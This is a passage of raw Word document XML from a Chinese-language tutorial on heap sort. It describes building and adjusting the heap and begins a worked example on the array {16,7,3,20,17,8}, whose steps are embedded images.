          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则整个排序过程完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始化堆：将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1..n]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造为堆；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>     2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将当前无序区的堆顶元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>同该区间的最后一个记录交换，然后将新的无序区调整为新的堆。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因此对于堆排序，最重要的两个操作就是构造初始堆和调整堆，其实构造初始堆事实上也是调整堆的过程，只不过构造初始堆是对所有的非叶节点都进行调整。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面举例说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>给定一个整形数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a[]={16,7,3,20,17,8}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，对其进行堆排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00E95B56" w:rsidP="00E95B56">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先根据该数组元素构建一个完全二叉树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95B56" w:rsidRDefault="00E95B56" w:rsidP="00E95B56">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5025983" cy="4213556"/>
            <wp:effectExtent l="19050" t="0" r="3217" b="0"/>
            <wp:docPr id="7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9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029826" cy="4216778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363CB4" w:rsidRDefault="00363CB4" w:rsidP="00E95B56">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363CB4" w:rsidRDefault="00363CB4" w:rsidP="00E95B56">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363CB4" w:rsidRDefault="00363CB4" w:rsidP="00363CB4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5052263" cy="4410906"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="21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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5051971" cy="4410651"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00FF7AA9" w:rsidP="00363CB4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRPr="00E95B56" w:rsidRDefault="00FF7AA9" w:rsidP="00363CB4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:ind w:firstLine="270"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3742516"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3742516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00424D8E" w:rsidRDefault="00FF7AA9" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4878129"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4878129"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00FF7AA9" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00FF7AA9" w:rsidP="00601272">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3086839"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3086839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00CA78AD" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4865268"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="256"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04" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4865268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00601272" w:rsidP="00DB7AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4552138"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="22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5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4552138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB7AB9" w:rsidRDefault="00DB7AB9" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB7AB9" w:rsidRDefault="00DB7AB9" w:rsidP="00DB7AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1364686"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="221"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06" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1364686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000098C" w:rsidRDefault="0000098C" w:rsidP="00DB7AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4589335"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="222"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07" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4589335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000098C" w:rsidRDefault="0000098C" w:rsidP="00DB7AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4847342"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="223"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08" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4847342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7AA9" w:rsidRDefault="00214EB8" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4720934"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="258"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09" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
